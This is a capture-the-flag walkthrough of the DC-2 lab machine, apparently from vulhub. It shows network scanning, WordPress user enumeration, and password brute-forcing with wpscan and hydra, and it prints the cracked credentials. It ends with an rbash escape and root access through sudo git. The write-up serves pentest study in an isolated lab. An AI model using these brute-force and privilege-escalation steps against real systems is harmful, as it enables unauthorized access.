DC-2

vulhub DC-2 pentest

collect message

root@kali:~/Desktop# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.26.114.94  netmask 255.255.240.0  broadcast 172.26.127.255
        inet6 fe80::a00:27ff:fe5c:6526  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:5c:65:26  txqueuelen 1000  (Ethernet)
        RX packets 4226  bytes 539314 (526.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 41604  bytes 2529267 (2.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2088  bytes 90758 (88.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2088  bytes 90758 (88.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@kali:~/Desktop# nmap -sS 172.26.112.0/20 -p 80 --open
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 00:13 EST

root@kali:~/Desktop# nmap -sS 172.26.112.0/20 -p 80 --open --oN DC-2.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 00:13 EST
Nmap scan report for DC-2.mshome.net (172.26.118.49)
Host is up (0.0014s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)

Nmap done: 4096 IP addresses (3 hosts up) scanned in 84.32 seconds

scan port

root@kali:~# nmap -sS 172.26.118.49 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 03:08 EST
Nmap scan report for dc-2 (172.26.118.49)
Host is up (0.00050s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds

port 7744 is interesting
more Detect

root@kali:~# nmap -sS 172.26.118.49 -p 80,7744 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 03:11 EST
Nmap scan report for dc-2 (172.26.118.49)                                                                                                                      
Host is up (0.0011s latency).                                                                                                                                  
                                                                                                                                                               
PORT     STATE SERVICE VERSION                                                                                                                                 
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))                                                                                                          
|_http-generator: WordPress 4.7.10                                                                                                                             
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.06 ms dc-2 (172.26.118.49)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds

add hosts

vi /etc/hosts

visit homepage

Brute dir

dirb http://dc-2/

+ http://dc-2/index.php (CODE:301|SIZE:0)                                                                                                                                    
==> DIRECTORY: http://dc-2/wp-admin/                                                                                            
==> DIRECTORY: http://dc-2/wp-content/                                                                                          
==> DIRECTORY: http://dc-2/wp-includes/                                                                                         
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)                                                                                     
                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)                                                                              
==> DIRECTORY: http://dc-2/wp-admin/css/                                                                                        
==> DIRECTORY: http://dc-2/wp-admin/images/                                                                                     
==> DIRECTORY: http://dc-2/wp-admin/includes/                                                                                   
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)                                                                              
==> DIRECTORY: http://dc-2/wp-admin/js/                                                                                         
==> DIRECTORY: http://dc-2/wp-admin/maint/                                                                                      
==> DIRECTORY: http://dc-2/wp-admin/network/                                                                                    
==> DIRECTORY: http://dc-2/wp-admin/user/                                                                                       
                                                                                                                                
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)                                                                            
==> DIRECTORY: http://dc-2/wp-content/languages/                                                                                
==> DIRECTORY: http://dc-2/wp-content/plugins/                                                                                  
==> DIRECTORY: http://dc-2/wp-content/themes/                                                                                   
                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                      
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                      
                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                         
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                         
                                                                                                                                
---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                
---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                    
                                                                                                                                
---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0) 

obviously webcms is wordpress

attack

found flag1

flag 1
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

flag2

we found Backstage management system

dir http://dc-2/wp-admin/network/admin.php

wpscan is a good tool for scanning wordpress websites,so start scanning
usage:
wpscan –url=’http://dc-2' –api-token=your token

but these vuln isn’t easy to use to attack

see flag1 may we should brute password

first looking for author

wpscan –url=”http://dc-2" -e u

admin / jerry / tom

flag1 prompt use cewl

cewl is costume word list generator

cewl http://dc-2 -w password.dic

wpscan –url=”http://dc-2" -U user.dic(include admin,jerry and tom) -P password.dic

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                                               
[SUCCESS] - tom / parturient 

so try login as jeryy/tom

jerry:
got flag2

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

flag3&flag4

It’s hard to getshell-> flag2 prompt us try another way

hydra -L user.dic -P password.dic ssh://172.26.118.49 -vV -o dc2.ssh

obtain username:tom password:parturient

so ssh tom@172.26.118.49 -p 7744
cat is not allow so less flag3.txt or vi flag3.txt
flag3.txt got it

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

obtain rbash

ls /home/* -la

jerry/flag4.txt

less /jerry/flag4.txt
got it!
```tex

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

the final flag

rbash escape

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

then you can use bash

elevated privileges

sudo -l

tom may not allow run sudo

login as jerry

su jerry

password:adipiscing

got it!

sudo -l

find jerry can run git

so try use git to elevated privileges

$sudo git -p help config

!/bin/sh
#whoami
#root

---

cat final-flag.txt
__    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

think

if there is no way to get webshell,may we could find anthor way!It’s import for us who study pentest